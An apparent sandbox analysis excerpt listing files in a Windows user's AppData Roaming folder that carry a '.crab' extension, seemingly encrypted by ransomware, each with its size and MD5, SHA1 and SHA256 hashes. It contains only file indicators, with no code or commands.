SHA256: 025b41f5eba1a75faf451efdafbe6f557ee5764e0b51ab41c53c055b3ab4b7cc 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\6ulyrsdrcdr2g.png.crab 85.13 KB MD5: b4f4998b3e141eb86f66828fd033a7e2
SHA1: a51873df7d2f7139176a97b18c0f412b4395e079
SHA256: 84c58fd20c177f237791170da33ba3479c15629aca06dd69c5183863f58712be 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\jscache\globdata.crab 0.54 KB MD5: a92cb33d2e322219e7c24fff2c45c7a4
SHA1: 8a96093b9dd5d6510e91da0ca167c47594e8d164
SHA256: 008a007a8573ef90e93d7cc9399281abb327c24a1d2f252bc68e61c639c3526d 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\jscache\globsettings.crab 0.54 KB MD5: fe2f65b03fb5445d74cbea3b40f0c763
SHA1: f3b5456eb50630ce4939e39da5b68b48b2f3145c
SHA256: 9b50fc137b57840e92b38548728417ba44f300c493cd8332d1fff9b14ad4fa8d 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\addressbook.acrodata.crab 11.15 KB MD5: 03652c3fc433dda27fdaf3c394e42a5b
SHA1: b284e1ec482e9430ea7f6352772f648fdd0ab35b
SHA256: 033e5b8ddd094d79bbe6d28bc3f89118f557b01deb6bd3eb3fa450234ee3b472 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\crlcache\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl.crab 1.13 KB MD5: 56408f23dd18155ebdeca5c815d2bc8b
SHA1: f8fb41f675c6a3fcadc5af325f42e422b0a85ee5
SHA256: 490838d372dfe8bdc2f2d4df7a0acad07bc1d730d8918bf99cd8602949990066 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\crlcache\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl.crab 0.93 KB MD5: 3cb7493a6a147525c80822a30d8bfea7
SHA1: 7025ba538a972e41e96b7d679504f6699e49c383
SHA256: ea61f07fe7acad835b8a8ba03a19ece848329677d5251a7a2e82d2cc9d028af4 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\logtransport2.cfg.crab 0.73 KB MD5: 76d9bae6ef407c385c1795c798a9fc7a
SHA1: f070e234c8651f58893187b0b385f04e3d064109
SHA256: 3c59cb6955e3f7241da0a64d8cf542a790140c886c1623580c19532dab106aa8 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\sonar\sonar1.0\sonar_policy.xml.crab 18.84 KB MD5: 40a79ead2e7688e5422d4333d16dc2b0
SHA1: 17b6ec9c1aece5b25b9b42e068b85718d881ec2a
SHA256: 61287ae06f0bb66a69aedf51755f593d268371013ae0c8423d40b2979bbba0a2 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\bg7c4xyzdicswmpfddmq.m4a.crab 17.62 KB MD5: c1d52402961575dd4590159b49b46635
SHA1: ffb8954664a9cb9f25da44b0197fdeb9aa60f68d
SHA256: 703ceb4feec3c182d335484cc0442d6f6f344a8adf412a592201a5b70edf1adb 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\cipinmbyjo4vyr.gif.crab 66.21 KB MD5: 3f6b410300884631d93e11b8eac3807e
SHA1: 3c449758d569e125ac28d233a690e64f4ca11c01
SHA256: b3825419a68b3425707d103fc2dcc4c481c23bc428083f7ed80e809c5081d7fb 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\d9dv3j2nxmkke0zk.mkv.crab 16.51 KB MD5: 9770f88bd4ce5575a595fcfd018ca84d
SHA1: c2b9bdb6049e7d2ad6c00f647995ffdbe655c404
SHA256: e1d4fa3bfea0a34fd90cad33da12d4b02fb0d2922df1493e6315b3ec3a470698 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\dgxzy 8vmjlytnh.wav.crab 27.63 KB MD5: d859464f0e4af21144dc71191b5f9b49
SHA1: 6ef59e90af5bf3a41609a8dead9d521756196b0e
SHA256: ae5449586f0a64c1914bfaa4544c7f61a4b3caf2e8025a4ba27e38cd57c7a40e 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\ffti16pc.wav.crab 32.04 KB MD5: b5814f260f8a9500347043d35dd79e5d
SHA1: dc50e00074ccf241887e647c8727c7d4b6d8de55
SHA256: 8462241951532cbac8cbc76e3692e762618627043310dfc41a19b269c045b344 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\fgluwmcyaloqdde5.jpg.crab 31.12 KB MD5: 694f9a875a60dcf93a5cd09a3fe5a14a
SHA1: 662fd29ed0d58184385afc327789170cb6ad2d30
SHA256: 761beb8c6a5d78896ea379e8dc843e73633203f6cfd1f74f6310e39b4197b86c 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\gkx413.xls.crab 95.93 KB MD5: 48c288e0eb3ac4a5249c58d1d1a153c8
SHA1: ea358cc8fabd7bc993e5ceb9f7983fbd255c80b1
SHA256: 82bb3e788a5ba32b96a3ef4cf495c99c7e52976f3ac9af8524d6236b875f0b21 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\g_ bvk hrwfcozc-.mp3.crab 28.90 KB MD5: c9ae08a831bbe5a179bab70c70ae4688
SHA1: c663331774de26c17dae97c6fffea93cad8ff902
SHA256: 1d8ffb6a5243a68a9aea5d8d1e97006b57b513abf830f366b8a578d50ace9d77 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\hfch.jpg.crab 18.09 KB MD5: f4808d18349051541d80e62488d7bd45
SHA1: 3bbd90f2daa8ba8c5ada79b39eee4a56c2ecd7b4
SHA256: 8cff36a2e6e66d67cd77e0f231b91b2254cffc30fb6e3720e73fe196842cde60 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\hnpmpoaayn8a6gpyhrx.jpg.crab 76.24 KB MD5: bd68f0741a28c1378710a2e5665267c1
SHA1: 96abb319595c03b4a68bb46b95a2c69190a17776
SHA256: 78197c726d6cc6a47843c16c64261c4a353281e6a167fe30930aefc01bcebe1a 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\lcdz0ce9cpp4kk7l99.rtf.crab 5.76 KB MD5: 2ff646199fd81e46b2dfb449acbf4e6b
SHA1: 9d8977bfc332d7de1d55763416535c2b17ecfb2d
SHA256: c6c57dd77bbcd752b90bec110bb8b08afa2daddea7cd97101e45e2a69c273dbd 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\lhx44.flv.crab 100.26 KB MD5: 78435ff300da452030496aa0324ed9c0
SHA1: 175209c8710aa49489cd12e7d20e3f40c6abe663
SHA256: 050bf1639217fd93aa67bad2649fef831cf95e2e72d3e8d2fa865727f082c8cc 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\m2uxciqiok6.swf.crab 78.84 KB MD5: 379792ae9cdbc9069a9c806edb62d676
SHA1: 0f9586b76b79edfeb1cd3ac0cff871cd40ad3b98
SHA256: 6425748ec9e8d1c30c883531283692b6cc93597636ba17286a47c0faac076ee4 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab 1.01 KB MD5: e33d1f98dc0b31f9d6919334bd154849
SHA1: 19a85451f2115cbf4cd5e2229aa6f357feea13cf
SHA256: 7a0406d49269b3c50c2969ee7b2fb97b0b5bf6b50d237b1b4eeded2361e9a632 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mbvwjawe.mp3.crab 36.32 KB MD5: 736103422d0576fd3c4db65ef2a5f69e
SHA1: 34a428023dfa7a8a7694bdac5389f94d88f0b2ad
SHA256: 1ced1dfa3a87c0b68cf6deb0880c83de67d488e40f769e387bf8dfc5f152747a 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\access\accesscache.accdb.crab 196.51 KB MD5: 88e2636960803fbfd29017421924585c
SHA1: 942bc136b2d808622886034d2e07e5b0a813d194
SHA256: 28d6c10142b6232142b046622779a52c96dc9a05ffaa1e42b96db7411e503fb1 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\access\system.mdw.crab 124.51 KB MD5: abbb0ac8706e3b1625aae8128b8af0e9
SHA1: 25cf91a94a871edc3ac463d960d131f921c9f0d0
SHA256: c7d3c51b00c7e139c269b3ef40bb19bfa76319f71534b04cb6034a17a35d955e 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\apasixtheditionofficeonline.xsl.crab 326.30 KB MD5: 3f97197873a448066adce281e6583f3c
SHA1: d0bd83ab5fad3d4176f9017d8739490ccedf9651
SHA256: 23226c2b4e0a105268512812cf2c9109beb285c55f13efa8726b382027e180b5 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\chicago.xsl.crab 290.57 KB MD5: 753256337acfe7160e3fc2a8f18b97a2
SHA1: 2674aa3b11abfd73510b9b30bf0f1f5be46c04ec
SHA256: f113b4d23da25c65e9811813811324d342a4d3ca6dc5cbf75435a979b5271573 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\gb.xsl.crab 262.88 KB MD5: 33c0a266e352be589f954c23f22fb709
SHA1: 6fdfad7710e0a6f2663487e50feaa994fa4fb34f
SHA256: 33b65492b55b66d4e16a56e956c12859e49473cd84e18e3fb789d1cd7cf5aeeb 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\gostname.xsl.crab 250.87 KB MD5: ed606308bc47173a3b9d1ae9a0e3e133
SHA1: 9ad4ffa19872487e12cd6e57bdc2d96a2be8c510
SHA256: 2f46f174e49453296785dde3dfe3f37e35466e243e238bc7e05c1a36bc83f716 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\gosttitle.xsl.crab 246.07 KB MD5: 3971f2299c6397ee71a253d01cb01409
SHA1: c7ba5aefe28552642925b9f8603c814af274ca75
SHA256: dcb28c9cd18e3374da2927175f88b834f4e2a4a869ace109fcfa3f11e3a31a35 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\harvardanglia2008officeonline.xsl.crab 278.65 KB MD5: 035bf2a24ec9572cda72feb847ed5d4f
SHA1: 6b5dcd9eb3bdedb5d8f2e94319ddc538c013eba2
SHA256: 405b36145d5b1fc35247588fa35e49511f1a45349acd87f42b3d9b71f4f9910d 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\ieee2006officeonline.xsl.crab 288.13 KB MD5: dfcc19ba6e0341a88ed95c4a3da277f3
SHA1: e5f7250329368b4e1a801e4f7cba6d924b6f45eb
SHA256: d93a61fb18caea0bf29e5e00b8f62d8452e03ceaad0d9ade7f89445d6d156063 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\iso690.xsl.crab 264.82 KB MD5: 64ce31ba890256f498dc02b4e5e7d024
SHA1: a0bc930bf0183d6c5d5afc041b66692e09520724
SHA256: f06b7674b5b5f62c7c58571eb758f16f97b01462c203451cbd9a9930a5f37ae0 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\iso690nmerical.xsl.crab 212.99 KB MD5: 44cd56bebb71f8e8aebff152cb0beb43
SHA1: e4a2560a82e8f6a38550aeff78a1620475611cfa
SHA256: a57ac6b2e8e20c5dac07a7e34d60b69b5d9cae0739584962fe341171a9f6e841 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\mlaseventheditionofficeonline.xsl.crab 249.76 KB MD5: 1284dcb58baf1a3644d52087ad84bfee
SHA1: 63bb9156d532f974cfd26e7d33901183ddd75721
SHA256: 78408f7c8491fe907213f2834e3fd8e306ed7e49b241ac00319871d2431ac26f 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\sist02.xsl.crab 245.96 KB MD5: 8a62af6a61c001799185a8292da0ef61
SHA1: 6aa4678aa97060013e5b328dac8cad027de114c8
SHA256: 946cd81ae064655c181c9b711af014dcc374b0065728e20ba35c98dfdb4ecb5a 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\turabian.xsl.crab 337.10 KB MD5: d590d501c32e670b02028048b0250cc8
SHA1: 3df94ec169866045c26de42c4cd99e65f7898a83
SHA256: 2bad0976eecf9bb01e0ff06b23229971d6126db2af62097cb3365f014643e038 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b.crab 0.57 KB MD5: 37773bbe5189ff9896de40334493ba4a
SHA1: 408a32011a15357fb550caef9192e678764259c2
SHA256: 7912de082598bca3e6290cb178e4462d4fe7a6660a5d06cef9572cd7980b0ce2 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b.crab 0.55 KB MD5: 7a7443d62a571876387c4cb17cfa0fda
SHA1: 3546da88360352330ba5b12e02e52b3914bea170
SHA256: bd4579e33fe510c2c4cd02f03efa6375d5769c2ad3d00c73600473f4cd3624dc 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx.crab 3.53 MB MD5: 9d568983a42790e51848f1f2c46b1d58
SHA1: fed1a2d75f427ea5c9b05fbd704833d30c3b4ae0
SHA256: 550270ca7ebc09b81cf14d46db67bfbfc6bdd41be1064b6be5cd6f89c0086df4 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\ms project\16\en-us\global.mpt.crab 1.21 MB MD5: ce3f6356ecbbe33e5e192feae3454e4d
SHA1: fec3e7ac70f7ad490511b4c48586b9dd875c7e0a
SHA256: c5a78485d5ba6212041231455458f6e491c5652077b66400a4f485b6ee1aa9e6 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\mso1033.acl.crab 37.37 KB MD5: cf93a498be88b1bb7a09a519607aa41a
SHA1: 9e1d3bde4b353650bbe3834365690819e6a895c0
SHA256: b99e25d690c92ef7c97524fe3e30515a5602f1f3a15660e3e28845ec9e886752 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\database1.lnk.crab 1.60 KB MD5: 5e94bd9160a9a0b0ef1a18d80facb428
SHA1: 38c5f1ef9f19964d58185e79f9da37def824641d
SHA256: e389fdd41942ef71d89158cfc829fbf5afd221cfcdf9494d029fcb1347914c2f 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\documents.lnk.crab 1.45 KB MD5: 5196afd04b515e27e8e7c39f3fb95ad5
SHA1: 2e389dd633d9bfa3d2dd0bf0be17fc24d9ca245c
SHA256: c9d6bbe7d6656335dc7a6bfde3a20f712ca1710ba162765aacb39f7bf606a64c 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\global.lnk.crab 1.98 KB MD5: c3e60a174b5be27a457d967571aa6502
SHA1: 6f94dbb31fc1fe7c7b6795f5dae2b543d7ff977e
SHA256: 6f9b4e6e33dd0707ac5b877623b62c7a3a4bdd6c53c60f36e7605a6205b151b3 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\index.dat.crab 0.60 KB MD5: 7b98441887c4dab35d7fdded45937a49
SHA1: 8b55b483b86c885aa1d81795d2729aeed185abdd
SHA256: 37ce53de706003e4c51ca4a07acb89d1c7a85dc520df39b895c6ac5502518c3e 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\templates.lnk.crab 1.68 KB MD5: 644239a39e1a92fa4e2627fa3e15ca3c
SHA1: b0545eca42178545c135c9701a275a14eb1598d1
SHA256: 47928b1466d04251cbaec5f1b38225d90236c9f27a22b60bbafbfc4676d0612d 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\onenote\16.0\preferences.dat.crab 5.57 KB MD5: 5d896e6c9d81766239c3fb1a91808c0b
SHA1: e5e1b6d0eb52457d000dc7c3ef50da209e38e55d
SHA256: 10eec75352dfbdc64bdc086df0a522aa0478fb301679f56b8aed6cfbc52f9bb8 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\outlook\outlook.srs.crab 3.01 KB MD5: c1f9efa37a8ed31818c98627daf62da1
SHA1: 3d38223c2e3676df4c7ab84825854d991777a8e8
SHA256: 65e2383079b42bbad43aa1ed5f6722c248d4d561960b7b2666ca28d5f5cc64eb 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\outlook\outlook.xml.crab 2.85 KB MD5: c3b2f987a50e6b1c57b315b9f02b36a2
SHA1: f15cb337307489bf9684c81c019d36b7135e8539
SHA256: 04ec43fb0f45267ab5f20a1f37af75e0afc4b1925f1eef78aae5a1157b8e86d8 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\credhist.crab 0.96 KB MD5: 6f899e433aa2ed4a345d6929fe6f8dd7
SHA1: 67cd99949c62e8d0fe4be5ee5c962a6aeb14a511
SHA256: fd922eba0288a448d8e48e5a27e02d09731f8e4a05827b104512ba5505ba6d53 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\1c746130-55ae-4579-a953-fc484f604840.crab 0.98 KB MD5: 85aad3218d990218e94e2bdef4cbd16c
SHA1: d9894cbe46e5d9dc2675d575dd4f4298fa642bad
SHA256: 2801e25eec0de0f1eda59bc80628283153447ea86c33ab93e0a7455bafc3c224 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\496f2c5b-a90f-4380-b805-3bf6ac63451b.crab 0.98 KB MD5: fc2f06736b119b70c79e6856d85b9e66
SHA1: 57728355f7781b5a3e3f1ebb205dee2c0c179835
SHA256: a8c2b157e5fd82ff06d834b4e1d6e4cbc38669760d78cecb228b43bf3451f3f6 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\5b8a3202-35dc-4437-b5d7-374f5e872415.crab 0.98 KB MD5: a439051a065b7d5248b28c6256367c90
SHA1: eb7164b7c7760b67b1bcb2c08973274c7fde9e67
SHA256: 5579c5f4921ba1a6055d8905f413b864ecafb81ebd9cf63ca0fb7fc4ee159b38 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\d7746ecf-458e-4e71-8557-8ac80457022a.crab 0.98 KB MD5: 7a526e3ed35469726ed7a0c706971911
SHA1: 7b852f4a6bf64216dfc9f60668187a34bb065feb
SHA256: bdf3851f684e0c0e57c329d541687f26230742cb6187f8cdab8e20b14e9bd285 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\preferred.crab 0.54 KB MD5: 6e1f84f7e787d9dc56e2987d9b12c5c0
SHA1: 343aaf2cb5945446a7ebfe80bb0dbf8b46da939f
SHA256: b70adf0309718c924e66eb0cb5091bf9a7ec5f7d9bb4d75da98c4add06fb2cda 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\synchist.crab 0.59 KB MD5: 847ea50e569ecc47f0b81240a31c7193
SHA1: 66706a4719a466604fde9fbc1fed3abe0d9677f4
SHA256: a1755abf186c4aec0b425265cc196739df228d2529717b45cc4a3c9ce56a29a3 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab 0.68 KB MD5: ddd7cc37597ae3857977380838990242
SHA1: 79c37b86371a8b11c633c9bd8d05ad158bd25186
SHA256: de68fc62f02dde3db84a5490bb4fd3ee78d00473d2918a0191528400fedf7af0 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\calendar insights.xltm.crab 893.37 KB MD5: 5915eae22dc62dc2d266b794cf5b8e35
SHA1: cf0e91bd954f28bae7dd85b09ff8a27c68363b80
SHA256: 59a91838d65a0d53f87b2f41e9f73fd95e37eb0b20b862cf901be0e0d5974257 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\cashflow analysis.xltm.crab 371.62 KB MD5: cc66b966136b8ca5bb967a360f59e6f6
SHA1: d82276e049004f6419f9a86e76840465420a44a2
SHA256: 23420708b5de11222db26b0eef42bdd5094fdbb8b553085fe2ab058f98b88e4c 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\email insights.xltm.crab 721.29 KB MD5: 825e47c240fa23896863804e07b37019
SHA1: 859f750979185b07e0871735dd86f1face53f508
SHA256: aa88a4b08d1c9d1410613f99a464f27845dbe5577d961bfd5469df689baa04b5 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090430[[fn=banded]].thmx.crab 549.46 KB MD5: 2e3907cc8e080969508afb5192cff9fe
SHA1: 6bc55879b366625acad7a10c5826494cf8569eb4
SHA256: 828a6f913780d402b43eec78eb75f01cd770e16ea49b18b948e7a2e496188b4b 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090434[[fn=wood type]].thmx.crab 1.57 MB MD5: 78831e17d1267e8b436011365874f1b9
SHA1: 12337cf79286fd319a16859a4a443eea7fbf4c76
SHA256: dd49c6680700ef0950c68951248c124ed6fecbb92eeefb2495fca2ecff006a8f 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457444[[fn=basis]].thmx.crab 545.48 KB MD5: 8c105872411103f24c38bbfb00787a76
SHA1: e5ba94d6d7ddf0908f2bc5c05e19b5a4c67bdcb3
SHA256: 5abe687d7fa8ecfdd2b8551c3e41d00707bc695fa45eb0089ae4d119b757a7f9 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457464[[fn=dividend]].thmx.crab 558.04 KB MD5: 685c24d2f38d8e360f4ba7068373a8f2
SHA1: 6eeac9660e1990c6e4883105da5081dbdfbf49b1
SHA256: 350886b7972e7d5d314969e5a098c57bc1ff17c4dacd6a60ea18b3edb560e8a6 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457475[[fn=frame]].thmx.crab 511.30 KB MD5: 9a153dcc009bbfeee64758c5639f412c
SHA1: 7ceeb37cffee0808b8944cb98c9ff4f5e733648b
SHA256: bc1c39aac5fd44a753baa42f2cf2678775961258c09b56f472f234b2df609db5 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457485[[fn=mesh]].thmx.crab 2.94 MB MD5: d48a0ed75333e6f1fa20afa0a89bb856
SHA1: b614e68bc238cb26a2d8b93b93f92d497c9ae003
SHA256: 3032dc917db8cc91e37d2f5950656a8c4598164f074fa67cdb6b76035a4ee2ce 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457491[[fn=metropolitan]].thmx.crab 759.93 KB MD5: 338099e7c5a25eb8e1cad2636cf3790e
SHA1: 6e5c1db0db965b14eaabac88555e6019db14d7fa
SHA256: 0a9cda9cd04acb56c4b8e3ee8f0045f2aa8b73dabfe9a64a63cae5924e235181 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457496[[fn=parallax]].thmx.crab 903.52 KB MD5: 55c7f5a9f749b7c4c5f5e77c218c6faa
SHA1: 2f932919c8a16331eaf15bb892107845027a2c23
SHA256: 58d9e58e3039d0bcc14c83298835168c6222c35f6ce750d551dd9add7c10763c 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457503[[fn=quotable]].thmx.crab 944.80 KB MD5: 7e1c4abc1364d34e11857479c5b677e6
SHA1: ee2b6c20e1fe0b41ea95b053e4917867fb4424ce
SHA256: 8c3484b5e371c8951d983dd64b6a2d35a676bccc2288e8038e97010a957bd9a0 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457510[[fn=savon]].thmx.crab 1.15 MB MD5: 8dd8cb916cf26122cee5599cf1e44bc3
SHA1: 032b84c2dfe6d1cb07ca9c56cc820ae6cbd92c69
SHA256: f3bd8c248a8a9c70d339165d62e9fb608db594ddaa1d0538fac0b8e2b3cd6c7c 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457515[[fn=view]].thmx.crab 475.71 KB MD5: e0b852fab3827f0080c2aa1227e330f9
SHA1: 88ec774209666f25e8902cc169b8c35106396f68
SHA256: 7adaa50cbf43835c7d8d406bfd6a68778a351e09818720338dedda93e4286071 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033917[[fn=berlin]].thmx.crab 953.65 KB MD5: 441879eb46f94102ce72d1fa5626dbed
SHA1: 14b3f6386dd1a2442a68283d22f40dee2df5cba4
SHA256: 3c9764d107a20212fbe48c54dfdcd923548eb592c671bb552b69e779f1097f8f 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033919[[fn=circuit]].thmx.crab 1.40 MB MD5: 2e3ea8cf3d8b21cb8279c2d0ec41b720
SHA1: 41eedfab2bebac89b4ee1e7ff6b6960e438e37ab
SHA256: 91ae4789fcbe10fc2d89bbf9c890814a1c1b1f9501a1ced4cb7cd44947b7a2c1 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033921[[fn=damask]].thmx.crab 2.12 MB MD5: 5e86f3a0535d2d36e2c7ae15895def13
SHA1: f5fa6c42c521cb1197bae1db5d8eb6887f7f8b41
SHA256: 5a1782db00708eb82a93402345e271a98c12b699cdb3d39c74fc327e32af19c3 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033925[[fn=droplet]].thmx.crab 1.67 MB MD5: 851f9b51aa30ded25186ff25816d0fe0
SHA1: 49b3f5d005e980012fb92621189be79b63d10ac8
SHA256: d5812bae59e46517e87cfec8deb363aa55ff66f00a0393666df4ceed6e871f05 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033927[[fn=main event]].thmx.crab 2.79 MB MD5: bd3945480d22af40c43fcc16b7299e60
SHA1: 66d74d4b16d6103a4b0b0be6e61e9891dae1659a
SHA256: 9cb09adf29585064be53717b5125ecca9e7c585bc967194fddd294dc9241f392 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033929[[fn=slate]].thmx.crab 2.25 MB MD5: 1b3c17419cffe48c7eb4669136a85a1a
SHA1: dad43ffe2e15d26dade95badf8b98de914a9cc1d
SHA256: 1971f8660fd148dbda4f0a4247d52c28cbc7cd902abf209b4cbabe1f76a748a4 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033937[[fn=vapor trail]].thmx.crab 3.44 MB MD5: 64547bb00986157b2099772ab0a3a024
SHA1: 2a93d37e2eebf223b9361078bab0f4bdb0da102f
SHA256: 9bd7d63d20238068ccc1c0ca15214058ce7312b3cf17e3f2ffbea61db6f87834 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001103[[fn=headlines]].thmx.crab 527.48 KB MD5: 036ab9517946a43ba6959c41f8cd15f3
SHA1: 6fa0b84c8f919b092dd35c827126dd136733cd4f
SHA256: 40649c46362f83977913904cde31c77732f18a513585304444d994599a2a6243 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001104[[fn=feathered]].thmx.crab 1.96 MB MD5: aa93ced7e6796f7c37741a49095afa04
SHA1: e2c447477379c9253cbe9eaaf16ac12d7ede40c9
SHA256: 979fa4e90589c7756b9e1eac0597218a48b063aeb5961d212459d76360a3add4 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001105[[fn=crop]].thmx.crab 524.54 KB MD5: d33eb6c73e332500b924833281858e49
SHA1: 3516407ad4f48610b9f5c15917ad35e8127274ad
SHA256: 366e9c5144b62c7f21cd63666a0ea49721eaa810e99cd6d5e6bd33f542543a9c 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001106[[fn=badge]].thmx.crab 648.90 KB MD5: 323bd0784067657c67b445d91584fa87
SHA1: c018cafc129cd8a32f5ef1b63592ab76ca673967
SHA256: 8b81634ffcd189073227c330325d378495498c0fdde07a046a9a3ad8e5246b81 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001114[[fn=gallery]].thmx.crab 1.04 MB MD5: 29f54d3061b7edaad9aea21fe46f4d18
SHA1: a09bc9b0a1543a78f12ba27f68ed71e9b4061a2a
SHA256: f091130e28867d96effbacbdaf6fd68cfc19196002bda215aa5b3ddf6ab2a1ce 		False
...
